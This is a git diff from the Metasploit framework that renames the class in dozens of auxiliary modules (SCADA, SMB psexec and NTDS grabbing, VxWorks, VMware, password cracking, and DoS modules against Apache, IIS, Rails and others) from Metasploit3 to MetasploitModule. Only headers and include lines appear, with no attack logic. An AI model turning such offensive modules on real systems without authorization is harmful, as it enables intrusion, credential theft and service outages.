a/modules/auxiliary/admin/scada/modicon_stux_transfer.rb b/modules/auxiliary/admin/scada/modicon_stux_transfer.rb index 4906829d56..fc0368f945 100644 --- a/modules/auxiliary/admin/scada/modicon_stux_transfer.rb +++ b/modules/auxiliary/admin/scada/modicon_stux_transfer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Rex::Socket::Tcp diff --git a/modules/auxiliary/admin/scada/multi_cip_command.rb b/modules/auxiliary/admin/scada/multi_cip_command.rb index 6abc81f58e..5561973f04 100644 --- a/modules/auxiliary/admin/scada/multi_cip_command.rb +++ b/modules/auxiliary/admin/scada/multi_cip_command.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Rex::Socket::Tcp diff --git a/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb b/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb index 6d0dde4b03..2c83b0530b 100644 --- a/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb +++ b/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::TcpServer diff --git a/modules/auxiliary/admin/serverprotect/file.rb b/modules/auxiliary/admin/serverprotect/file.rb index b12195b257..61bf21da5b 100644 --- a/modules/auxiliary/admin/serverprotect/file.rb +++ b/modules/auxiliary/admin/serverprotect/file.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Rex::Platforms::Windows diff --git a/modules/auxiliary/admin/smb/check_dir_file.rb b/modules/auxiliary/admin/smb/check_dir_file.rb index 3f85ac29ef..70a0b33446 100644 --- a/modules/auxiliary/admin/smb/check_dir_file.rb +++ b/modules/auxiliary/admin/smb/check_dir_file.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/smb/delete_file.rb b/modules/auxiliary/admin/smb/delete_file.rb index 417aea54d2..a6c409ec32 100644 --- a/modules/auxiliary/admin/smb/delete_file.rb +++ b/modules/auxiliary/admin/smb/delete_file.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/smb/download_file.rb b/modules/auxiliary/admin/smb/download_file.rb index d6aa05a4b6..07672ac4d4 100644 --- a/modules/auxiliary/admin/smb/download_file.rb +++ b/modules/auxiliary/admin/smb/download_file.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/smb/list_directory.rb b/modules/auxiliary/admin/smb/list_directory.rb index 53e52f66e8..011b0d9c60 100644 --- a/modules/auxiliary/admin/smb/list_directory.rb +++ b/modules/auxiliary/admin/smb/list_directory.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/smb/psexec_command.rb b/modules/auxiliary/admin/smb/psexec_command.rb index 77c3daa7f0..5747494726 100644 --- a/modules/auxiliary/admin/smb/psexec_command.rb +++ b/modules/auxiliary/admin/smb/psexec_command.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client::Psexec include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb index ed89e046a5..739afedfcc 100644 --- a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb +++ b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client::Psexec diff --git a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb index e0c7b914b6..5d809e37a6 100644 --- a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb +++ b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/smb/upload_file.rb b/modules/auxiliary/admin/smb/upload_file.rb index b52f54f8a1..6580411c71 100644 --- a/modules/auxiliary/admin/smb/upload_file.rb +++ b/modules/auxiliary/admin/smb/upload_file.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb index 24d11c9978..6a03ca85e6 100644 --- a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb +++ b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SunRPC diff --git a/modules/auxiliary/admin/tftp/tftp_transfer_util.rb b/modules/auxiliary/admin/tftp/tftp_transfer_util.rb index 9618c5eed9..d02081daa8 100644 --- a/modules/auxiliary/admin/tftp/tftp_transfer_util.rb +++ b/modules/auxiliary/admin/tftp/tftp_transfer_util.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Rex::Proto::TFTP include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/tikiwiki/tikidblib.rb b/modules/auxiliary/admin/tikiwiki/tikidblib.rb index 5e63df3926..5ed08b4865 100644 --- a/modules/auxiliary/admin/tikiwiki/tikidblib.rb +++ b/modules/auxiliary/admin/tikiwiki/tikidblib.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/upnp/soap_portmapping.rb b/modules/auxiliary/admin/upnp/soap_portmapping.rb index 4ddc743e52..a7d4a52622 100644 --- a/modules/auxiliary/admin/upnp/soap_portmapping.rb +++ b/modules/auxiliary/admin/upnp/soap_portmapping.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize diff --git a/modules/auxiliary/admin/vmware/poweroff_vm.rb b/modules/auxiliary/admin/vmware/poweroff_vm.rb index 08d8294543..0069b455de 100644 --- a/modules/auxiliary/admin/vmware/poweroff_vm.rb +++ b/modules/auxiliary/admin/vmware/poweroff_vm.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/vmware/poweron_vm.rb b/modules/auxiliary/admin/vmware/poweron_vm.rb index 826dd96338..3b20dbe4b2 100644 --- a/modules/auxiliary/admin/vmware/poweron_vm.rb +++ b/modules/auxiliary/admin/vmware/poweron_vm.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/vmware/tag_vm.rb b/modules/auxiliary/admin/vmware/tag_vm.rb index 30de864641..1c825f62f3 100644 --- a/modules/auxiliary/admin/vmware/tag_vm.rb +++ b/modules/auxiliary/admin/vmware/tag_vm.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb b/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb index 97b3bfb1e5..284198a04b 100644 --- a/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb +++ b/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb b/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb index 09bd23daf3..08de7df684 100644 --- a/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb +++ b/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp def initialize(info = {}) diff --git a/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb b/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb index 4b15e11364..d95582eace 100644 --- a/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb +++ b/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC_Client diff --git a/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb b/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb index e857b9eb34..5c737a13e8 100644 --- a/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb +++ b/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC_Client diff --git a/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb b/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb index f179f7ef4c..db348c3865 100644 --- a/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb +++ b/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC_Client diff --git a/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb b/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb index 106dbfba96..15157e9313 100644 --- a/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb +++ b/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC_Client include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb index 77e2f3a893..352625b1b8 100644 --- a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb +++ b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/webmin/file_disclosure.rb b/modules/auxiliary/admin/webmin/file_disclosure.rb index dceb166244..e43c5849bf 100644 --- a/modules/auxiliary/admin/webmin/file_disclosure.rb +++ b/modules/auxiliary/admin/webmin/file_disclosure.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/zend/java_bridge.rb b/modules/auxiliary/admin/zend/java_bridge.rb index f02adcbf4d..dd858742f5 100644 --- a/modules/auxiliary/admin/zend/java_bridge.rb +++ b/modules/auxiliary/admin/zend/java_bridge.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/analyze/jtr_aix.rb b/modules/auxiliary/analyze/jtr_aix.rb index 52969f35b0..7fd0a99c39 100644 --- a/modules/auxiliary/analyze/jtr_aix.rb +++ b/modules/auxiliary/analyze/jtr_aix.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_crack_fast.rb b/modules/auxiliary/analyze/jtr_crack_fast.rb index e1137d8945..56bd36b89e 100644 --- a/modules/auxiliary/analyze/jtr_crack_fast.rb +++ b/modules/auxiliary/analyze/jtr_crack_fast.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_linux.rb b/modules/auxiliary/analyze/jtr_linux.rb index c519ea2b43..0a7b751087 100644 --- a/modules/auxiliary/analyze/jtr_linux.rb +++ b/modules/auxiliary/analyze/jtr_linux.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_mssql_fast.rb b/modules/auxiliary/analyze/jtr_mssql_fast.rb index 45980b7cbe..dd3312009e 100644 --- a/modules/auxiliary/analyze/jtr_mssql_fast.rb +++ b/modules/auxiliary/analyze/jtr_mssql_fast.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_mysql_fast.rb b/modules/auxiliary/analyze/jtr_mysql_fast.rb index 246a7c9cb1..17e54cc9c2 100644 --- a/modules/auxiliary/analyze/jtr_mysql_fast.rb +++ b/modules/auxiliary/analyze/jtr_mysql_fast.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_oracle_fast.rb b/modules/auxiliary/analyze/jtr_oracle_fast.rb index e41d6ff806..781574011f 100644 --- a/modules/auxiliary/analyze/jtr_oracle_fast.rb +++ b/modules/auxiliary/analyze/jtr_oracle_fast.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_postgres_fast.rb b/modules/auxiliary/analyze/jtr_postgres_fast.rb index 5b0053951b..81f1549aaf 100644 --- a/modules/auxiliary/analyze/jtr_postgres_fast.rb +++ b/modules/auxiliary/analyze/jtr_postgres_fast.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary #Included to grab the john.pot and use some utiltiy functions include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/bnat/bnat_router.rb b/modules/auxiliary/bnat/bnat_router.rb index d63e805904..0225b81347 100644 --- a/modules/auxiliary/bnat/bnat_router.rb +++ b/modules/auxiliary/bnat/bnat_router.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary def initialize super( diff --git a/modules/auxiliary/bnat/bnat_scan.rb b/modules/auxiliary/bnat/bnat_scan.rb index 4757cbae8e..e5c907720b 100644 --- a/modules/auxiliary/bnat/bnat_scan.rb +++ b/modules/auxiliary/bnat/bnat_scan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Capture diff --git a/modules/auxiliary/client/smtp/emailer.rb b/modules/auxiliary/client/smtp/emailer.rb index 9e6831e2f3..a5f76cdeb4 100644 --- a/modules/auxiliary/client/smtp/emailer.rb +++ b/modules/auxiliary/client/smtp/emailer.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'yaml' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # # This module sends email messages via smtp diff --git a/modules/auxiliary/crawler/msfcrawler.rb b/modules/auxiliary/crawler/msfcrawler.rb index 7eb6ab4a4b..991f98e23d 100644 --- a/modules/auxiliary/crawler/msfcrawler.rb +++ b/modules/auxiliary/crawler/msfcrawler.rb @@ -17,7 +17,7 @@ require 'rinda/tuplespace' require 'pathname' require 'uri' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/docx/word_unc_injector.rb b/modules/auxiliary/docx/word_unc_injector.rb index 5c047d181f..81fc69dd76 100644 --- a/modules/auxiliary/docx/word_unc_injector.rb +++ b/modules/auxiliary/docx/word_unc_injector.rb @@ -18,7 +18,7 @@ require 'msf/core' # for creating files require 'rex/zip' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::FILEFORMAT diff --git a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb index ff25f23634..bfab3a37ac 100644 --- a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb +++ b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb b/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb index f9b0933648..786f2c16eb 100644 --- a/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb +++ b/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Dos include Msf::Exploit::Capture diff --git a/modules/auxiliary/dos/dns/bind_tkey.rb b/modules/auxiliary/dos/dns/bind_tkey.rb index 4b29d365b7..841db2cee5 100644 --- a/modules/auxiliary/dos/dns/bind_tkey.rb +++ b/modules/auxiliary/dos/dns/bind_tkey.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb b/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb index cef333391d..93b149e2fc 100644 --- a/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb +++ b/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/hp/data_protector_rds.rb b/modules/auxiliary/dos/hp/data_protector_rds.rb index 11029de675..a92ee46946 100644 --- a/modules/auxiliary/dos/hp/data_protector_rds.rb +++ b/modules/auxiliary/dos/hp/data_protector_rds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/3com_superstack_switch.rb b/modules/auxiliary/dos/http/3com_superstack_switch.rb index 99218cc07b..4978f58c29 100644 --- a/modules/auxiliary/dos/http/3com_superstack_switch.rb +++ b/modules/auxiliary/dos/http/3com_superstack_switch.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb b/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb index ae5709b7d7..f1a6fa892d 100644 --- a/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb +++ b/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer def initialize(info = {}) diff --git a/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb b/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb index f40516c242..ea62711de1 100644 --- a/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb +++ b/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/apache_mod_isapi.rb b/modules/auxiliary/dos/http/apache_mod_isapi.rb index da932d94c9..0309563629 100644 --- a/modules/auxiliary/dos/http/apache_mod_isapi.rb +++ b/modules/auxiliary/dos/http/apache_mod_isapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/apache_range_dos.rb b/modules/auxiliary/dos/http/apache_range_dos.rb index 4855af2930..92914f2613 100644 --- a/modules/auxiliary/dos/http/apache_range_dos.rb +++ b/modules/auxiliary/dos/http/apache_range_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanFile diff --git a/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb b/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb index 0974305d95..ad3d15abb9 100644 --- a/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb +++ b/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/canon_wireless_printer.rb b/modules/auxiliary/dos/http/canon_wireless_printer.rb index f13ad89ffe..ebb8d96f9f 100644 --- a/modules/auxiliary/dos/http/canon_wireless_printer.rb +++ b/modules/auxiliary/dos/http/canon_wireless_printer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/dell_openmanage_post.rb b/modules/auxiliary/dos/http/dell_openmanage_post.rb index 6f13cb2ca0..fb2e4c8ca7 100644 --- a/modules/auxiliary/dos/http/dell_openmanage_post.rb +++ b/modules/auxiliary/dos/http/dell_openmanage_post.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb b/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb index cdc449f22d..eace3af7d4 100644 --- a/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb +++ b/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/gzip_bomb_dos.rb b/modules/auxiliary/dos/http/gzip_bomb_dos.rb index a96f05e1b4..ecd3a5dd0e 100644 --- a/modules/auxiliary/dos/http/gzip_bomb_dos.rb +++ b/modules/auxiliary/dos/http/gzip_bomb_dos.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'zlib' require 'stringio' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) diff --git a/modules/auxiliary/dos/http/hashcollision_dos.rb b/modules/auxiliary/dos/http/hashcollision_dos.rb index 59d7e7370a..bc61b28bfb 100644 --- a/modules/auxiliary/dos/http/hashcollision_dos.rb +++ b/modules/auxiliary/dos/http/hashcollision_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/monkey_headers.rb b/modules/auxiliary/dos/http/monkey_headers.rb index 2f6c097029..7915eec2f4 100644 --- a/modules/auxiliary/dos/http/monkey_headers.rb +++ b/modules/auxiliary/dos/http/monkey_headers.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb index 165a9d582e..fa089a17be 100644 --- a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb +++ b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Watch out, dos all the things include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/dos/http/nodejs_pipelining.rb b/modules/auxiliary/dos/http/nodejs_pipelining.rb index 9f3181a0aa..b07ff1741c 100644 --- a/modules/auxiliary/dos/http/nodejs_pipelining.rb +++ b/modules/auxiliary/dos/http/nodejs_pipelining.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb b/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb index cca21add81..a0cfd4437b 100644 --- a/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb +++ b/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/rails_action_view.rb b/modules/auxiliary/dos/http/rails_action_view.rb index 92c685a1aa..92cccd67d7 100644 --- a/modules/auxiliary/dos/http/rails_action_view.rb +++ b/modules/auxiliary/dos/http/rails_action_view.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/rails_json_float_dos.rb b/modules/auxiliary/dos/http/rails_json_float_dos.rb index 3fb0da5c57..2dc123ecea 100644 --- a/modules/auxiliary/dos/http/rails_json_float_dos.rb +++ b/modules/auxiliary/dos/http/rails_json_float_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb index e90f6bec2d..0db48a5fcb 100644 --- a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb +++ b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class 